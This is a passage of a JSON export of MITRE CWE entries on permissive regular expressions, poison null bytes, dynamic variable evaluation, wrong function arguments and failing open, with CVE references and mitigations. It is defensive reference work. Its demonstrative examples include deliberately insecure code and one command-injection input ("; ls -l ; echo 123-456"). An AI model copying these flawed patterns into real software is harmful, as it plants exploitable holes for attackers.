modifier","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2878"},{"Reference":"CVE-2006-2908","Description":"Function allows remote attackers to execute arbitrary PHP code via the username field, which is used in a preg_replace function call with a /e (executable) modifier.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2908"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}},"Notes":{"Note":{"#text":"Under-studied. The existing PHP reports are limited to highly skilled researchers, but there are few examples for other languages. It is suspected that this is under-reported for all languages. Usability factors might make it more prevalent in PHP, but this theory has not been investigated.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Observed_Example"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"625":{"attr":{"@_ID":"625","@_Name":"Permissive Regular Expression","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses a regular expression that does not sufficiently restrict the set of allowed values.","Extended_Description":{"xhtml:p":"This effectively causes the regexp to accept substrings that match the pattern, which produces a partial comparison to the target. In some cases, this can lead to other weaknesses. Common errors include:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["not identifying the beginning and end of the target string","using wildcards instead of acceptable character ranges","others"]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"185","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"187","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"184","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"183","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This problem is frequently found when the regular expression is used in input validation or security features such as authentication."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"When applicable, ensure that the regular expression marks beginning and ending string patterns, such as \\"/^string$/\\" for Perl."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-37"},"Intro_Text":"The following code takes phone numbers as input, and uses a regular expression to reject invalid phone numbers.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$phone = GetPhoneNumber();if ($phone =~ /\\\\d+-\\\\d+/) {}else {}","xhtml:br":["",""],"xhtml:div":[{"#text":"system(\\"lookup-phone $phone\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:i":"# looks like it only has hyphens and digits","xhtml:br":""},{"#text":"error(\\"malformed number!\\");","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"An attacker could provide an argument such as: \\"; ls -l ; echo 123-456\\" This would pass the check, since \\"123-456\\" is sufficient to match the \\"\\\\d+-\\\\d+\\" portion of the regular expression."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-1895","Description":"\\".*\\" regexp leads to static code injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1895"},{"Reference":"CVE-2002-2175","Description":"insertion of username into regexp results in partial comparison, causing wrong database entry to be updated when one username is a substring of another.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2175"},{"Reference":"CVE-2006-4527","Description":"regexp intended to verify that all characters are legal, only checks that at least one is legal, enabling file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4527"},{"Reference":"CVE-2005-1949","Description":"Regexp for IP address isn\'t anchored at the end, allowing appending of shell metacharacters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1949"},{"Reference":"CVE-2002-2109","Description":"Regexp isn\'t \\"anchored\\" to the beginning or end, which allows spoofed values that have trusted values as substrings.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2109"},{"Reference":"CVE-2006-6511","Description":"regexp in .htaccess file allows access of files whose names contain certain substrings","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6511"},{"Reference":"CVE-2006-6629","Description":"allow load of macro files whose names contain certain substrings.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6629"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS08-J","Entry_Name":"Sanitize untrusted data passed to a regex"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Character Stripping Vulnerabilities&#34;, Page 437"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"626":{"attr":{"@_ID":"626","@_Name":"Null Byte Interaction Error (Poison Null Byte)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not properly handle null bytes or NUL characters when passing data between different representations or components.","Extended_Description":{"xhtml:p":["A null byte (NUL character) can have different meanings across representations or languages. For example, it is a string terminator in standard C libraries, but Perl and PHP strings do not treat it as a terminator. When two representations are crossed - such as when Perl or PHP invokes underlying C functionality - this can produce an interaction error with unexpected results. Similar issues have been reported for ASP. Other interpreters written in C might also be affected.","The poison null byte is frequently useful in path traversal attacks by terminating hard-coded extensions that are added to a filename. It can play a role in regular expression processing in PHP."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"147","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"436","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"ASP.NET","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Remove null bytes from all incoming strings."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-4155","Description":"NUL byte bypasses PHP regular expression check","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4155"},{"Reference":"CVE-2005-3153","Description":"inserting SQL after a NUL byte bypasses allowlist regexp, enabling SQL injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3153"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-514"}},{"attr":{"@_External_Reference_ID":"REF-515"}},{"attr":{"@_External_Reference_ID":"REF-516"}}]},"Notes":{"Note":[{"#text":"Current usage of \\"poison null byte\\" is typically related to this C/Perl/PHP interaction error, but the original term in 1998 was applied to an off-by-one buffer overflow involving a null byte.","attr":{"@_Type":"Terminology"}},{"#text":"There are not many CVE examples, because the poison NULL byte is a design limitation, which typically is not included in CVE by itself. It is typically used as a facilitator manipulation to widen the scope of potential attacks against other vulnerabilities.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes, Research_Gaps, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Relationships"}]}},"627":{"attr":{"@_ID":"627","@_Name":"Dynamic Variable Evaluation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"In a language where the user can influence the name of a variable at runtime, if the variable names are not controlled, an attacker can read or write to arbitrary variables, or access arbitrary functions.","Extended_Description":"The resultant vulnerabilities depend on the behavior of the application, both at the crossover point and in any control/data flow that is reachable by the related variables or functions.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"914","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"183","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}}]},"Background_Details":{"Background_Detail":"Many interpreted languages support the use of a \\"$$varname\\" construct to set a variable whose name is specified by the $varname variable. In PHP, these are referred to as \\"variable variables.\\" Functions might also be invoked using similar syntax, such as $$funcname(arg1, arg2)."},"Alternate_Terms":{"Alternate_Term":{"Term":"Dynamic evaluation"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Modify Application Data","Execute Unauthorized Code or Commands"],"Note":"An attacker could gain unauthorized access to internal program variables and execute arbitrary code."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Refactoring","Description":"Refactor the code to avoid dynamic variable evaluation whenever possible."},{"Phase":"Implementation","Strategy":"Input Validation","Description":"Use only allowlists of acceptable variable or function names."},{"Phase":"Implementation","Description":"For function names, ensure that you are only calling functions that accept the proper number of arguments, to avoid unexpected null arguments."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-0422","Description":"Chain: Dynamic variable evaluation allows resultant remote file inclusion and path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0422"},{"Reference":"CVE-2007-2431","Description":"Chain: dynamic variable evaluation in PHP program used to modify critical, unexpected $_SERVER variable for resultant XSS.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2431"},{"Reference":"CVE-2006-4904","Description":"Chain: dynamic variable evaluation in PHP program used to conduct remote file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4904"},{"Reference":"CVE-2006-4019","Description":"Dynamic variable evaluation in mail program allows reading and modifying attachments and preferences of other users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4019"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-517"}},{"attr":{"@_External_Reference_ID":"REF-518"}}]},"Notes":{"Note":{"#text":"Under-studied, probably under-reported. Few researchers look for this issue; most public reports are for PHP, although other languages are affected. This issue is likely to grow in PHP as developers begin to implement functionality in place of register_globals.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Background_Details, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Common_Consequences, Observed_Examples, Potential_Mitigations, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"628":{"attr":{"@_ID":"628","@_Name":"Function Call with Incorrectly Specified Arguments","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product calls a function, procedure, or routine with arguments that are not correctly specified, leading to always-incorrect behavior and resultant weaknesses.","Extended_Description":{"xhtml:p":"There are multiple ways in which this weakness can be introduced, including:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["the wrong variable or reference;","an incorrect number of arguments;","incorrect order of arguments;","wrong type of arguments; or","wrong value."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary","Description":"This is usually primary to other weaknesses, but it can be resultant if the function\'s API or function prototype changes."}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Other","Access Control"],"Impact":["Quality Degradation","Gain Privileges or Assume Identity"],"Note":"This weakness can cause unintended behavior and can lead to additional weaknesses such as allowing an attacker to gain unintended access to system resources."}},"Detection_Methods":{"Detection_Method":{"Method":"Other","Description":"Since these bugs typically introduce incorrect behavior that is obvious to users, they are found quickly, unless they occur in rarely-tested code paths. Managing the correct number of arguments can be made more difficult in cases where format strings are used, or when variable numbers of arguments are supported."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Build and Compilation","Description":"Once found, these issues are easy to fix. Use code inspection tools and relevant compiler features to identify potential violations. Pay special attention to code that is not likely to be exercised heavily during QA."},{"Phase":"Architecture and Design","Description":"Make sure your API\'s are stable before you use them in production code."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-62"},"Intro_Text":"The following PHP method authenticates a user given a username/password combination but is called with the parameters in reverse order.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function authenticate($username, $password) {}authenticate($_POST[\'password\'], $_POST[\'username\']);","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// authenticate user"}},"xhtml:br":["",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-63"},"Intro_Text":"This Perl code intends to record whether a user authenticated successfully or not, and to exit if the user fails to authenticate. However, when it calls ReportAuth(), the third argument is specified as 0 instead of 1, so it does not exit.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"sub ReportAuth {}sub PrivilegedFunc{}","xhtml:div":[{"#text":"my ($username, $result, $fatal) = @_;PrintLog(\\"auth: username=%s, result=%d\\", $username, $result);if (($result ne \\"success\\") &amp;&amp; $fatal) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"die \\"Failed!\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"my $result = CheckAuth($username);ReportAuth($username, $result, 0);DoReallyImportantStuff();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":["","",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-64"},"Intro_Text":"In the following Java snippet, the accessGranted() method is accidentally called with the static ADMIN_ROLES array rather than the user roles.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private static final String[] ADMIN_ROLES = ...;public boolean void accessGranted(String resource, String user) {}private boolean void accessGranted(String resource, String[] userRoles) {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"String[] userRoles = getUserRoles(user);return accessGranted(resource, ADMIN_ROLES);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// grant or deny access based on user roles"}}]}}}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2006-7049","Description":"The method calls the functions with the wrong argument order, which allows remote attackers to bypass intended access restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7049"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"DCL10-C","Entry_Name":"Maintain the contract between the writer and caller of variadic functions"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP37-C","Entry_Name":"Call functions with the correct number and type of arguments","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"DCL00-PL","Entry_Name":"Do not use subroutine prototypes","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP33-PL","Entry_Name":"Do not invoke a function in a context for which it is not defined","Mapping_Fit":"Imprecise"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Detection_Factors, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Detection_Factors, Relationships"}],"Previous_Entry_Name":{"#text":"Incorrectly Specified Arguments","attr":{"@_Date":"2008-04-11"}}}},"636":{"attr":{"@_ID":"636","@_Name":"Not Failing Securely (\'Failing Open\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"When the product encounters an error condition or failure, its design requires it to fall back to a state that is less secure than other options that are available, such as selecting the weakest encryption algorithm or using the most permissive access control restrictions.","Extended_Description":"By entering a less secure state, the product inherits the weaknesses associated with that state, making it easier to compromise. At the least, it causes administrators to have a false sense of security. This weakness typically occurs as a result of wanting to \\"fail functional\\" to minimize administration and support costs, instead of \\"failing safe.\\"","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"280","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Failing Open"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"Intended access restrictions can be bypassed, which is often contradictory to what the product\'s administrator expects."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Subdivide and allocate resources and components so that a failure in one part does not affect the entire product."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Switches may revert their functionality to that of hubs when the table used to map ARP information to the switch interface overflows, such as when under a spoofing attack. This results in traffic being broadcast to an eavesdropper, instead of being sent only on the relevant switch interface. To mitigate this type of problem, the developer could limit the number of ARP entries that can be recorded for a given switch interface, while other interfaces may keep functioning normally. Configuration options can be provided on the appropriate actions to be taken in case of a detected failure, but safe defaults should be used."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-5277","Description":"The failure of connection attempts in a web browser resets DNS pin restrictions. An attacker can then bypass the same origin policy by rebinding a domain name to a different IP address. This was an attempt to \\"fail functional.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5277"},{"Reference":"CVE-2006-4407","Description":"Incorrect prioritization leads to the selection of a weaker cipher. Although it is not known whether this issue occurred in implementation or design, it is feasible that a poorly designed algorithm could be a factor.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4407"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A7","Entry_Name":"Improper Error Handling","Mapping_Fit":"CWE More Specific"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-522"}}]},"Notes":{"Note":{"#text":"Since design issues are hard to fix, they are rarely publicly reported, so there are few CVE examples of this problem as of January 2008. Most publicly reported issues occur as the result of an implementation error instead of design, such as CVE-2005-3177 (Improper handling of large numbers of resources) or CVE-2005-2969 (inadvertently disabling a verification step, leading to selection of a weaker protocol).","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"Pascal Meunier","Submission_Organization":"Purdue University","Submission_Date":"2008-01-18"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Name, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content 